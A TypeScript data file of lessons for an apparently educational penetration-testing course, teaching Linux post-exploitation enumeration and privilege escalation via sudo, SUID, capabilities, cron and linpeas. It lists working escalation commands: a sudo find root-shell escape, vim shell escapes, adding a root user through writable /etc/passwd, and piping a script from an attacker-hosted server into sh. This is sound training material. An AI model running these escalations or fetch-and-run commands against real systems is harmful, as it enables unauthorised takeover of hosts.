import type { Lesson } from "@/types";

export const linuxLessons: Lesson[] = [
  {
    id: "lin-enum",
    title: "Linux: First Enumeration After a Shell",
    category: "linux",
    categoryLabel: "Linux",
    difficulty: "beginner",
    summary: "The exact commands to run the moment you land on a Linux host: who am I, what can I reach, what's unusual.",
    estMinutes: 9,
    methodology: ["MITRE ATT&CK: Discovery"],
    objectives: ["Establish identity and privileges", "Map the host quickly", "Spot the obvious escalation leads"],
    teacherIntro:
      "You got a shell. Stop — before anything else, find out who you are, what privileges you have, and what OS this is. Then enumerate methodically. Panic-running privesc scripts before you understand the box wastes time and creates noise.",
    why: "Every escalation path depends on your current context. 'Who am I and what can I touch' is the foundation for every decision that follows.",
    notes: [
      { heading: "Stabilize first", body: "If this is a dumb reverse shell, upgrade it to a PTY (python3 -c 'import pty;pty.spawn(\"/bin/bash\")', then Ctrl-Z, stty raw -echo; fg). A proper TTY prevents a dozen frustrations.", tone: "tip" },
      { heading: "The order", body: "Identity (whoami/id) → OS/kernel (uname -a, /etc/os-release) → sudo rights (sudo -l) → SUID/capabilities → cron → network/processes → readable secrets. Breadth first." },
      { heading: "Automate, then understand", body: "Tools like linpeas are great, but read their output critically — they highlight leads, they don't hand you root. Understand why a lead matters before chasing it.", tone: "teacher" },
    ],
    commands: [
      { id: "lin-id", command: "id; whoami; hostname", platform: "linux", purpose: "Establish your user, groups, and the hostname.", why: "Group membership (e.g. sudo, docker, lxd, adm) can itself be an escalation path.", exampleOutput: "uid=1000(www-data) gid=1000(www-data) groups=1000(www-data),999(docker)", lookFor: ["Interesting groups: sudo, docker, lxd, disk, adm", "Whether you're already root"], risk: "low", next: "Check kernel/OS, then sudo -l.", tags: ["linux", "id", "enum"] },
      { id: "lin-os", command: "uname -a; cat /etc/os-release", platform: "linux", purpose: "Identify kernel and distribution.", why: "Kernel version and distro scope which local issues and tooling are relevant.", lookFor: ["Kernel version", "Distro + release"], risk: "low", tags: ["linux", "kernel", "os"] },
      { id: "lin-netproc", command: "ss -tulpn; ps auxww", platform: "linux", purpose: "See listening services and running processes.", why: "Internal-only services (bound to 127.0.0.1) and processes running as root are common escalation and pivot leads.", lookFor: ["127.0.0.1-only services", "root-owned processes", "credentials in command lines"], risk: "low", tags: ["linux", "network", "processes"] },
    ],
    lookFor: ["Your groups", "Kernel/distro", "Internal services", "root-owned processes"],
    branches: [
      { condition: "You're in the docker/lxd group", outcome: "That group membership is often a direct route to root — investigate it.", goto: { type: "lesson", id: "lin-sudo" }, risk: "high" },
      { condition: "sudo -l shows entries", outcome: "Follow the sudo branch — passwordless or GTFOBins-able commands are top priority.", goto: { type: "lesson", id: "lin-sudo" }, risk: "high" },
    ],
    commonMistakes: ["Running linpeas before checking id/sudo -l", "Not stabilizing the shell first"],
    next: ["lin-sudo", "lin-suid", "lin-cron"],
    related: ["os-identification", "shell-stabilize"],
    keywords: ["linux", "enumeration", "shell", "privesc", "id", "whoami"],
  },
  {
    id: "lin-sudo",
    title: "Linux PrivEsc: sudo -l and Its Branches",
    category: "linux",
    categoryLabel: "Linux",
    difficulty: "intermediate",
    summary: "The single highest-yield privesc check, and exactly what to do for each possible result.",
    estMinutes: 8,
    methodology: ["MITRE ATT&CK: Privilege Escalation"],
    objectives: ["Interpret sudo -l output", "Exploit misconfigured sudo via GTFOBins", "Branch correctly when sudo is a dead end"],
    teacherIntro:
      "sudo -l is often the first and best thing to check. It tells you what commands you can run as another user (usually root). The output has a few distinct shapes, and each points to a different next move.",
    why: "Misconfigured sudo is one of the most common Linux escalation paths in labs and in the real world. GTFOBins turns 'you can run X as root' into 'you are root'.",
    notes: [
      { heading: "Case A — passwordless entry", body: "(ALL) NOPASSWD: /usr/bin/find → you can run that binary as root with no password. Check GTFOBins for how to spawn a shell from it. This is usually a quick win.", tone: "success" },
      { heading: "Case B — password required", body: "You can run something as root but must enter your password. If you have it, proceed; if not, keep enumerating other vectors (SUID, cron, capabilities) in parallel." },
      { heading: "Case C — no sudo rights", body: "'user is not allowed to run sudo' → sudo is a dead end. Move to SUID binaries, capabilities, cron jobs, writable files, and group-based paths.", tone: "info" },
      { heading: "GTFOBins is your reference", body: "For any binary you can run elevated, GTFOBins lists the exact escape. Understand what the escape does before running it.", tone: "teacher" },
    ],
    commands: [
      { id: "lin-sudol", command: "sudo -l", platform: "linux", purpose: "List what you may run via sudo.", why: "Directly reveals the most common escalation path.", exampleOutput: "User www-data may run the following commands on host:\n    (root) NOPASSWD: /usr/bin/find", lookFor: ["NOPASSWD entries", "Specific binaries (find, vim, less, python, tar…)", "(ALL) or (root)"], risk: "low", next: "Look the binary up on GTFOBins and use the documented escape.", tags: ["linux", "sudo", "gtfobins"] },
      { id: "lin-sudo-find", command: "sudo find . -exec /bin/sh \\; -quit", platform: "linux", purpose: "Example GTFOBins escape when you can run find as root.", why: "find can execute commands; run as root it spawns a root shell.", lookFor: ["# root prompt", "id shows uid=0"], risk: "high", next: "You are root — capture proof and record impact.", tags: ["linux", "sudo", "find", "gtfobins"] },
    ],
    lookFor: ["NOPASSWD", "GTFOBins-listed binaries", "Dangerous env settings (LD_PRELOAD via env_keep)"],
    branches: [
      { condition: "NOPASSWD on a GTFOBins binary", outcome: "Spawn a root shell using the documented escape.", goto: { type: "phase", id: "privilege_escalation" }, risk: "high" },
      { condition: "No sudo access", outcome: "Pivot to SUID and capabilities enumeration.", goto: { type: "lesson", id: "lin-suid" } },
    ],
    exercise: {
      id: "lsudo-ex",
      prompt: "sudo -l shows: (root) NOPASSWD: /usr/bin/vim. What's the correct move?",
      options: ["Give up — vim isn't an exploit", "Use vim's GTFOBins shell escape to get a root shell", "Brute force the root password", "Reboot the machine"],
      answerIndex: 1,
      explanation: "vim can spawn a shell (:!/bin/sh, or -c ':!sh'). Since you can run it as root without a password, that shell runs as root. GTFOBins documents the exact syntax. Recognizing that 'a text editor I can run as root' equals 'root' is the core skill here.",
    },
    next: ["lin-suid", "lin-cron"],
    keywords: ["sudo", "sudo -l", "gtfobins", "nopasswd", "privesc", "linux"],
  },
  {
    id: "lin-suid",
    title: "Linux PrivEsc: SUID, SGID & Capabilities",
    category: "linux",
    categoryLabel: "Linux",
    difficulty: "intermediate",
    summary: "Find binaries that run with elevated rights and turn the interesting ones into a shell.",
    estMinutes: 8,
    objectives: ["Enumerate SUID/SGID binaries", "Enumerate file capabilities", "Identify exploitable ones via GTFOBins"],
    teacherIntro:
      "SUID binaries run as their owner (often root) regardless of who launches them. Capabilities are a finer-grained version of the same idea. Both can be escalation paths when the binary can be coerced into running your commands.",
    why: "A single SUID-root binary that GTFOBins can escape is a direct path to root — and these misconfigurations are extremely common.",
    notes: [
      { heading: "Enumerate", body: "find / -perm -4000 -type f 2>/dev/null for SUID; -2000 for SGID; getcap -r / for capabilities. Compare the results against a mental baseline of 'normal' binaries." },
      { heading: "Focus on the unusual", body: "Standard SUID binaries (passwd, sudo, mount) are expected. A SUID copy of python, find, nmap, or a custom binary is what you want. Check each against GTFOBins.", tone: "tip" },
      { heading: "Capabilities", body: "cap_setuid on python or perl is effectively root. getcap -r / surfaces these quietly." },
    ],
    commands: [
      { id: "lin-suid-find", command: "find / -perm -4000 -type f 2>/dev/null", platform: "linux", purpose: "List all SUID binaries.", why: "SUID-root binaries are prime escalation candidates.", exampleOutput: "/usr/bin/passwd\n/usr/bin/sudo\n/usr/bin/find\n/opt/backup", lookFor: ["Unusual entries (find, python, nmap, custom bins)", "Anything in /opt or a home dir"], risk: "low", next: "Check each unusual binary on GTFOBins.", tags: ["linux", "suid", "find"] },
      { id: "lin-getcap", command: "getcap -r / 2>/dev/null", platform: "linux", purpose: "List files with Linux capabilities.", why: "cap_setuid+ep on an interpreter is effectively root.", exampleOutput: "/usr/bin/python3.8 = cap_setuid+ep", lookFor: ["cap_setuid on python/perl/ruby", "cap_dac_read_search"], risk: "low", next: "Use the interpreter's setuid(0) to become root.", tags: ["linux", "capabilities", "getcap"] },
    ],
    lookFor: ["Non-standard SUID binaries", "GTFOBins matches", "Dangerous capabilities"],
    branches: [
      { condition: "SUID/cap binary is GTFOBins-exploitable", outcome: "Use the documented technique to escalate.", goto: { type: "phase", id: "privilege_escalation" }, risk: "high" },
      { condition: "Nothing obvious", outcome: "Check cron jobs and writable files next.", goto: { type: "lesson", id: "lin-cron" } },
    ],
    next: ["lin-cron"],
    keywords: ["suid", "sgid", "capabilities", "getcap", "gtfobins", "privesc"],
  },
  {
    id: "lin-cron",
    title: "Linux PrivEsc: Cron, Writable Files & PATH",
    category: "linux",
    categoryLabel: "Linux",
    difficulty: "intermediate",
    summary: "Scheduled jobs and writable files that run as root are a quiet, reliable escalation path.",
    estMinutes: 7,
    objectives: ["Find root cron jobs", "Identify writable scripts/paths they use", "Exploit relative PATH in root scripts"],
    teacherIntro:
      "If root runs a script on a schedule and you can influence that script — because it's writable, or it calls a program by relative name your PATH controls — you can run code as root. This one rewards patience and careful reading.",
    why: "Cron-based escalation is common on labs and easy to miss because it's not a single dramatic command — it's a small misconfiguration you have to notice.",
    notes: [
      { heading: "Find the jobs", body: "cat /etc/crontab and ls -la /etc/cron.*. Note anything running as root, especially scripts in world-writable locations or your own home." },
      { heading: "Two classic bugs", body: "1) The script (or a file it sources) is writable by you → append your payload. 2) The script calls a binary by relative name → prepend a malicious binary of that name via PATH." },
      { heading: "Also check writable files", body: "find / -writable -type f 2>/dev/null (filter noise). Writable service configs, scripts, or /etc/passwd are all potential wins.", tone: "tip" },
    ],
    commands: [
      { id: "lin-crontab", command: "cat /etc/crontab; ls -la /etc/cron.d /etc/cron.daily 2>/dev/null", platform: "linux", purpose: "Enumerate scheduled jobs.", why: "Root-run schedules are the target; find the ones you can influence.", lookFor: ["Jobs running as root", "Scripts in writable/odd locations", "Relative command names"], risk: "low", tags: ["linux", "cron"] },
      { id: "lin-writable", command: "find / -writable -type f -not -path '/proc/*' 2>/dev/null | grep -vE '^/(sys|run)'", platform: "linux", purpose: "Find files you can modify.", why: "A writable file used by root is an escalation primitive.", lookFor: ["Writable scripts run by cron/services", "Writable /etc/passwd (add a root user)"], risk: "low", tags: ["linux", "writable", "find"] },
    ],
    lookFor: ["Root cron jobs you can influence", "Writable scripts/configs", "Relative PATH in privileged scripts"],
    commonMistakes: ["Not waiting a cron interval to confirm execution", "Missing a writable sourced file"],
    next: ["lin-linpeas"],
    keywords: ["cron", "crontab", "writable", "path", "privesc", "linux"],
  },
  {
    id: "lin-linpeas",
    title: "Using linPEAS Without Drowning",
    category: "linux",
    categoryLabel: "Linux",
    difficulty: "beginner",
    summary: "Automated enumeration is a spotlight, not an answer. How to run linpeas and prioritize what it screams about.",
    estMinutes: 5,
    objectives: ["Run linpeas safely", "Read its color-coded output", "Prioritize leads over noise"],
    teacherIntro:
      "linpeas runs hundreds of checks and colors the interesting ones. It's excellent — but a wall of output overwhelms beginners. The trick is knowing what its highlights mean and checking them in priority order.",
    why: "linpeas accelerates enumeration, but only if you can separate the red/yellow 'probably exploitable' items from the sea of informational output. Understanding beats scrolling.",
    notes: [
      { heading: "Colors", body: "Bright red/yellow highlights = 95% likely a privesc vector. Focus there first: sudo/SUID/capabilities/cron findings, writable files, and stored credentials." },
      { heading: "Transfer it cleanly", body: "Host it from your box (python3 -m http.server) and curl it to the target, or pipe it directly. Run it, save the output, and read it deliberately." },
      { heading: "Don't outsource thinking", body: "linpeas points; you decide. Confirm each lead manually and understand the mechanism before exploiting.", tone: "teacher" },
    ],
    commands: [
      { id: "lin-peas-run", command: "curl -s http://<YOUR_IP>:8000/linpeas.sh | sh | tee linpeas.out", platform: "linux", purpose: "Run linpeas and save the output.", why: "One pass gathers a huge amount of context; saving it lets you re-read without rerunning.", lookFor: ["Red/yellow highlights", "sudo/SUID/caps/cron sections", "credentials found"], risk: "low", next: "Triage the highlighted vectors in priority order.", tags: ["linux", "linpeas", "enumeration"] },
    ],
    lookFor: ["Highlighted vectors", "Credentials in files", "Kernel/service leads"],
    commonMistakes: ["Treating linpeas output as a to-do list without triage", "Ignoring highlighted items you don't understand"],
    next: ["lin-sudo", "lin-suid"],
    keywords: ["linpeas", "enumeration", "privesc", "linux", "peass"],
  },
];
